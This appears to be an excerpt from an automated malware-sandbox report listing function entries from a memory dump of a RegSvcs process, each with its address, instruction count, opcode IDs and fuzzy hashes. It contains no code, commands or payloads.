                                                        • Instruction Fuzzy Hash: 7A31F731A4152C9BDB32DF18CC41FEEB7BAEB15750F0500A5EA45A7290D775DE818FA0
                                                        Function 01654588 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                        • Instruction ID: 0d77a83b73194ae77e1b154581709a487d71ff672afdfc93f8201f65804aab50
                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                        • Instruction Fuzzy Hash: 9B217435A00615EFCB55CF58CD80A8EBBF5FF48714F5080A9EE159B241EA71DA45CB60
                                                        Function 016544B0 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                        • Instruction ID: a120a487a8e97dbfda42d51f63ea197fb009b4be16f169c04debec8218dab333
                                                        • Opcode Fuzzy Hash: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                        • Instruction Fuzzy Hash: 8C21C1726087459BCB22CF58CC80B6BB7E5FB88764F008569FD559B741EB30E941CBA2
                                                        Function 0161E388 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction ID: 9de63dca01827086adafec7089db10328c568efeaff40e1c01a78b2fec666e48
                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction Fuzzy Hash: 08316B31600645EFD722CB68C984F6AB7B9EF85354F1449A9E952CB394E730EE42CB50
                                                        Function 0169E609 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ad8cb0d596ba99fb5f1d3f97aca3308fa089761c44d2b85178bf036bd4ce7eb
                                                        • Instruction ID: a88815b5f5d27b3e07cfefe8d623fb01d95a9bc540c68134d4c20b561dcb37ce
                                                        • Opcode Fuzzy Hash: 6ad8cb0d596ba99fb5f1d3f97aca3308fa089761c44d2b85178bf036bd4ce7eb
                                                        • Instruction Fuzzy Hash: 0A316975A00225DFCF18CF1CCC849AEB7BAEF84304B15855AF9099B391E772EA51CB94
                                                        Function 016A06F1 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                        • Instruction ID: bfa89cbe944077c1b81dfcca5daf28663a7c48b96df5aa2e29518e1a0e605128
                                                        • Opcode Fuzzy Hash: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                        • Instruction Fuzzy Hash: 89219C719002299BCB259F59CC81ABEBBF8FF49740B400069F941AB240D738AD42CFA5
                                                        Function 016A019F Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                        • Instruction ID: edd765f016212f9c74e2d7e4294b08d17f5816bf3f21685f11693c8de852192f
                                                        • Opcode Fuzzy Hash: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                        • Instruction Fuzzy Hash: 72218972600645AFD715DBACDD84A6AB7A8FF88740F144069F904DB7A1D738ED40CBA8
                                                        Function 016A0283 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                        • Instruction ID: c05cc92ae3976946a9fc1012d8ff5e48307c3ab76a0b245e93911627e9703512
                                                        • Opcode Fuzzy Hash: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                        • Instruction Fuzzy Hash: 9421C2729043469FD711EF59DD48B6BBBDCAF91240F48445ABD80C7351D734DD05CAA2
                                                        Function 01642835 Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                        • Instruction ID: 8b91dbabc47b5adbd4429439c49cd1c6b070e55e7c44a68b11b69dcd7d0458ea
                                                        • Opcode Fuzzy Hash: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                        • Instruction Fuzzy Hash: EB2107327056819BF3226B6C9D18B287BD5AF81770F290369FA20DB7D2D768C842C254
                                                        Function 0165A30B Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c209977cd9a4ccc028108c2e1b0845c4e022e8044c4c5ac3089dff072389fa20
                                                        • Instruction ID: ac94cd35f7cd6905ba1ddbbfc190dc3695a7761e694aad3fc3373c1008565ee9
                                                        • Opcode Fuzzy Hash: c209977cd9a4ccc028108c2e1b0845c4e022e8044c4c5ac3089dff072389fa20
                                                        • Instruction Fuzzy Hash: EF21AC75240B019FCB25DF69CC00B46B7F5BF48708F14856CA90ACB762E775E842CB98
                                                        Function 016DA49A Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc874efefea255385deef5564392976d9a1c5f067906a47c5c4ae41b96be03d8
                                                        • Instruction ID: e5f508b1862b72fa6ba2e03f32281515b54bf80f90ab7cdd77e86369db451949
                                                        • Opcode Fuzzy Hash: cc874efefea255385deef5564392976d9a1c5f067906a47c5c4ae41b96be03d8
                                                        • Instruction Fuzzy Hash: F4112973784A11BFE72256999C01F27769ADBD4B60F91006CF759CB280EB70DC01879A
                                                        Function 016A0946 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e2e3908a4dd961367bc5897f52a4fc7b28fc3232ef887c73a2379ab3ecd9a81
                                                        • Instruction ID: 8427c8e1b3323411e60e320db90be9f39bf188e506bdb6a3a811089cbc80fa59
                                                        • Opcode Fuzzy Hash: 0e2e3908a4dd961367bc5897f52a4fc7b28fc3232ef887c73a2379ab3ecd9a81
                                                        • Instruction Fuzzy Hash: AA21D4B1E00219ABCB24DFAAD8809AEFBF9FF99710F10412EE405A7254DB749941CF54
                                                        Function 016B80A8 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                        • Instruction ID: 157c3226c56c9792e13da7f0563adddf03877fa680374fd48957f6a839753d17
                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                        • Instruction Fuzzy Hash: 46216A72A0020AAFDB129F98CC80BEEBBBEEF88311F244459F901A7251D734D9918B50
                                                        Function 01650124 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction ID: ef359d0b9f8551fd334df26c59769fcd8dfbdf5311d674fbfda2743a337f36a2
                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction Fuzzy Hash: 31110173601605BFE7229F88CC40F9ABBB9EB80755F10002DFE018B280E671ED44CB65
                                                        Function 01628770 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64f9f2282f15afc04147de8e3c7a5ce93ace6cb9f2d26efe54525e45fec0bae0
                                                        • Instruction ID: 7564f8bc13e155144a5de5e2433cfda1367d4d3928a11bced8ad23245185a3c7
                                                        • Opcode Fuzzy Hash: 64f9f2282f15afc04147de8e3c7a5ce93ace6cb9f2d26efe54525e45fec0bae0
                                                        • Instruction Fuzzy Hash: D211B271701A319BDB11CF4DCC80A6ABBEDAF5A710B19406DEE089F305D7B2D9018F90
                                                        Function 0165AAEE Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                        • Instruction ID: 14410992161741f3bfbb3e624077dd7d9e3ac72b8b4a889d6eb2af9a95367527
                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                        • Instruction Fuzzy Hash: C2218B72600641DFDB758F89C940A66FBE6EB94B10F148A3DE94A87710E730EC01CB80
                                                        Function 016280E9 Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c428bd23cb319fa6cf14ce09c72bacedef094e0d9cdfbf3a02c4b086952c149
                                                        • Instruction ID: 87d7bb335dc30582ee92442e66c20209651ac72be2a7b777f2b832fc03e447ff
                                                        • Opcode Fuzzy Hash: 2c428bd23cb319fa6cf14ce09c72bacedef094e0d9cdfbf3a02c4b086952c149
                                                        • Instruction Fuzzy Hash: 0E214C75A00616DFCB14CF58C981AAABBF9FB88319F34816DD105A7391C771AD16CF90
                                                        Function 0165674D Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72024d4c2afa6640f15083521983167a89511fe93445aefd4285991c78bec079
                                                        • Instruction ID: 8559f71f09d5b8ec0c1170d2191fa429fecf6207188be17b1a14de3d885f3d70
                                                        • Opcode Fuzzy Hash: 72024d4c2afa6640f15083521983167a89511fe93445aefd4285991c78bec079
                                                        • Instruction Fuzzy Hash: E9216A71600A00EFD7608F69CC80B66B7E9FB84350F84882DE9AAC7650DB70E841CB64
                                                        Function 016B6870 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 755185fd4f447eb454d73b7dcabff4dfb5e7d69eeacee646da23fdd5b57269c1
                                                        • Instruction ID: 3eb40640323d053b30c1112d8725e487ba5f7178b64a32e40b980d01a34b50aa
                                                        • Opcode Fuzzy Hash: 755185fd4f447eb454d73b7dcabff4dfb5e7d69eeacee646da23fdd5b57269c1
                                                        • Instruction Fuzzy Hash: 2F119132240515EBD722EB9DCD80FDA77A9EB95660F114029F2059B251DA70E941C7A0
                                                        Function 0164E8C0 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c06bb0bd38046b6a8f0b30f83706f4f73c7d4aa40e047126981ec83f8121b4f
                                                        • Instruction ID: d7e75b6f5b2c0caa794b950fc8831e6da550b377bb56b3f4ed0320b85e8db3a0
                                                        • Opcode Fuzzy Hash: 0c06bb0bd38046b6a8f0b30f83706f4f73c7d4aa40e047126981ec83f8121b4f
                                                        • Instruction Fuzzy Hash: 5A112637305114AFCB19DB29CC81A6BB267EFD6374B25453DEA22CB391EA71D842C394
                                                        Function 016566B0 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db533a0ce8437c27b7b29f09a8b7e34ec620369a5c7f2f75bfe3545f51c65d8e
                                                        • Instruction ID: b820310ce6899f9fa842c351c6c9b9f8c9e7d67d99d81be6d9e707bea5cc10df
                                                        • Opcode Fuzzy Hash: db533a0ce8437c27b7b29f09a8b7e34ec620369a5c7f2f75bfe3545f51c65d8e
                                                        • Instruction Fuzzy Hash: BA11BC76A012059BCB65CF59CD80A6ABBE9AB84620F41807DED059B311E770DD00CBA4
                                                        Function 016EA8E4 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                        • Instruction ID: 0edaf4779cbb109d7ad1ea36c5bcd8ec38fcc8b0a29c67ee8990f5dfd5f8e609
                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                        • Instruction Fuzzy Hash: 08110436A10905AFDB19CB98CC05B9DBBF6EF84310F058269EC4597380E671AD11CBC0
                                                        Function 01620AD0 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                        • Instruction ID: be80aa101ad0c63d347a3bc4c24b28879f5e200c141be5c056d3499072a45f84
                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                        • Instruction Fuzzy Hash: F721E2B5A00B059FD3A0CF29C840B52BBE4FB48B10F10492EE98AC7B40E371E814CB94
                                                        Function 016AE7E1 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                        • Instruction ID: 7720133affdc565300b75cf0c0a4f19f5e45934ee3799fc8dc8ea5f9c2701471
                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                        • Instruction Fuzzy Hash: 6A11C232600601EFE7219F48CC40B56BBE6EF85754F46842CEA0A9B260DB32DD40DFA0
                                                        Function 016427ED Relevance: .1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                        • Instruction ID: bb76ccb2447c567ea80c43d2abf1f7fe20e056e5b7f956f022378d2038677fc5
                                                        • Opcode Fuzzy Hash: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                        • Instruction Fuzzy Hash: CE010472605645AFF316A6ADEC98F6B7A8DEF80390F160069FD00CB341DA14DC01C275
                                                        Function 01624690 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                        • Instruction ID: 7f8514ef4ce3d7fe5a78bf12822abd4a14a425a3ad45cf8fa9812d51baeda750
                                                        • Opcode Fuzzy Hash: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                        • Instruction Fuzzy Hash: 7311C236200A65AFDB25CF59DC80F667BA9EB85764F004519FA288B750CB71E800CF60
                                                        Function 016F4B00 Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                        • Instruction ID: 082e86b85590d4cb0f8f9fd823aab096b2a884122df29baa80a2df2fcf63a289
                                                        • Opcode Fuzzy Hash: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                        • Instruction Fuzzy Hash: A011E0322006059BD7229A29DC44B67B7A6FFC4210F14442DEB4287B91DF30A802CB90
                                                        Function 01656620 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                        • Instruction ID: 95f9369d0c928d7d685a2d5b55a0e63953674ac4a999cd1b257d94bbf3ef20ff
                                                        • Opcode Fuzzy Hash: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                        • Instruction Fuzzy Hash: 8111CE72A01626ABDB21DF59CD80B5EFBB9EF88750F900068EE01A7300D730AD01CBA5
                                                        Function 0164EA2E Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                        • Instruction ID: 11fb1ab6ea9b9969f7724a7f04dab5990f716b34b4a45791b02320c0a15e2192
                                                        • Opcode Fuzzy Hash: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                        • Instruction Fuzzy Hash: 9201D27150010A9FC329DF1CD844F26BBFAFBC6724F20816EE0048B264D7749C82CB94
                                                        Function 0164E53E Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                        • Instruction ID: 54f8179331011726ab4b46c89674e138461f5b74e4b4dd9d0599dc1afdf383ff
                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                        • Instruction Fuzzy Hash: B3118E722016C2DBEB26A72CDD58B257B94FB41758F1901E0EE41CB792F72EC842C2A0
                                                        Function 016AE75D Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                        • Instruction ID: 91c1d9b6fd424ffe47dbd65f181c33a0aa0d836e0fb984e3fab2670320275928
                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                        • Instruction Fuzzy Hash: 89019236700615AFE7219F58CC40F7A7EAAEB85750F458428EA059B260E772ED41CF94
                                                        Function 0161A250 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                        • Instruction ID: 1fc1c22084cdd101d16e8724c362ebc1707614342a24113f20feacf6cb93cd3c
                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                        • Instruction Fuzzy Hash: F00126714067619BCB318F59DC40AB27BA9EF55760B08C62DFC958B285C331D401CB60
                                                        Function 016F4940 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                        • Instruction ID: a4fccbc8259fed37d647ae07b414b4ceec3258ca47f8bc2c098d1cdbac3879c9
                                                        • Opcode Fuzzy Hash: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                        • Instruction Fuzzy Hash: 7C01D6726415019FC732DF1CDC40E13B7A9EB91770B15425DEA689B696EB30D801C7D0
